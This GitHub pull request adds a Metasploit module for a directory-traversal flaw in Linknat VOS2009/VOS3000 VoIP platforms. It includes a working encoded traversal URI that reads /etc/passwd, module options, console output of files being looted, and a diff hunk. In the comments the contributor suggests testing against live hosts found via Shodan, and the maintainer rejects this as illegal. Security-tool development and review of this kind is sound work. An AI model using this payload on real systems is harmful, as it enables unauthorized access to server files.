### PR TITLE
add Linknat Vos Manager Traversal

### PR DESCRIPTION
**Pull request by nixawk**
[Linknat](http://www.linknat.com) has serval VoIP Operation Platforms, ex: **VOS2009** / **VOS3000**.
There is a a file traversal vulnerability  in Linknat **VOS2009** / **VOS3000**, we can access a os file with the following uri:

```
http://XXX.XXX.XXX.XXX/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```

screen shot 2016-02-15 at 11 28 16 am

screen shot 2016-02-15 at 12 51 33 pm

A module is developed to exploit the vulnerability. Please try it against your company lab.

```
msf auxiliary(linknat_vos_traversal) > info 

       Name: Linknat Vos Manager Traversal
     Module: auxiliary/scanner/http/linknat_vos_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Nixawk

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  FILEPATH         /etc/passwd      yes       The path to the file to read
  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS           192.168.1.105    yes       The target address range or CIDR identifier
  RPORT            80               yes       The target port
  SSL              false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI        /eng/            yes       The path of Linknat Vos Manager (/chs/, /cht/, /eng/)
  THREADS          15               yes       The number of concurrent threads
  TRAVERSAL_DEPTH  5                yes       Traversal depth
  VHOST                             no        HTTP server virtual host

Description:
  This module attempts to test whether a file traversal vulnerability 
  is present in version of linknat vos2009/vos3000

References:
  http://www.linknat.com/
  http://www.wooyun.org/bugs/wooyun-2010-0145458

msf auxiliary(linknat_vos_traversal) > run 

[+] http://192.168.1.105/eng/ - File saved in: /Users/Open-Security/.msf4/loot/20160215123851_default_192.168.1.105_VOS20092.1.2.0_592629.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

### CODE REVIEW

File: modules/auxiliary/scanner/http/linknat_vos_traversal.rb [hunk 1]
```diff
@@ -0,0 +1,93 @@
...
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])
+      ], self.class)
+  end
+
+  def vos_uri(path)
+    full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"
```
Comment (jlee-r7) [inline modules/auxiliary/scanner/http/linknat_vos_traversal.rb]: `normalize_uri` can already do this, e.g.:
```ruby
normalize_uri(full_uri, path)

Comment (all3g) [inline modules/auxiliary/scanner/http/linknat_vos_traversal.rb]: Thanks @jlee-r7 ```vos_uri``` will give us more readable output that ```normalize_uri```.

**normalize_uri(target_ui, path)**

```
msf auxiliary(linknat_vos_traversal) > show options 

Module options (auxiliary/scanner/http/linknat_vos_traversal):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   FILEPATH         /etc/passwd      yes       The path to the file to read
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           192.168.1.105    yes       The target address range or CIDR identifier
   RPORT            80               yes       The target port
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /eng/            yes       The path of Linknat Vos Manager (/chs/, /cht/, /eng/)
   THREADS          1                yes       The number of concurrent threads
   TRAVERSAL_DEPTH  5                yes       Traversal depth
   VHOST                             no        HTTP server virtual host

msf auxiliary(linknat_vos_traversal) > run 

[*] /eng/js/lang_en_us.js - HTTP/1.1 200 OK
[+] http://192.168.1.105/eng/ - File saved in: /Users/Open-Security/.msf4/loot/20160219000747_default_192.168.1.105_VOS20092.1.2.0_055440.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**vos_uri(uri)**
```
msf auxiliary(linknat_vos_traversal) > run 

[*] http://192.168.1.105/eng/js/lang_en_us.js - HTTP/1.1 200 OK
[+] http://192.168.1.105/eng/ - File saved in: /Users/Open-Security/.msf4/loot/20160219001051_default_192.168.1.105_VOS20092.1.2.0_073400.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Comment (wchen-r7) [inline modules/auxiliary/scanner/http/linknat_vos_traversal.rb]: Does that mean you're making this kind of GET request?

```
GET http://192.168.1.105/eng/js/lang_en_us.js HTTP/1.1
```

Comment (all3g) [inline modules/auxiliary/scanner/http/linknat_vos_traversal.rb]: Yes. console outputs with full uri path includes domain and protocol.

**Comment by wchen-r7** [comment]
@all3g Could you please recommend a way to test this? Is there a virtual appliance or something we can download to test it?

**Comment by all3g** [comment]
@wchen-r7 Please search vos2009 / vos3000 with [**Shodan**](https://www.shodan.io/) or [**ZoomEye**](https://www.zoomeye.org). ex: 

- https://www.zoomeye.org/search?q=app%3Avos2009
- https://www.zoomeye.org/search?q=app%3Avos3000

**Comment by wchen-r7** [comment]
@all3g Testing a vulnerability against a live target without authorization is considered illegal; we can't do that, and we don't encourage anybody to do that, either.

If possible, could you please run the module on your own test box, and e-mail us the pcap? msfdev[at]metasploit.com. Thanks.

**Comment by all3g** [comment]
@wchen-r7  Thank you for reminding me. Please check the pcap package.
[linknat_vos_traversal.zip](https://github.com/rapid7/metasploit-framework/files/147606/linknat_vos_traversal.zip)

**Comment by wchen-r7** [comment]
@all3g Perfect, looks good. Thank you!

**Pull request merged**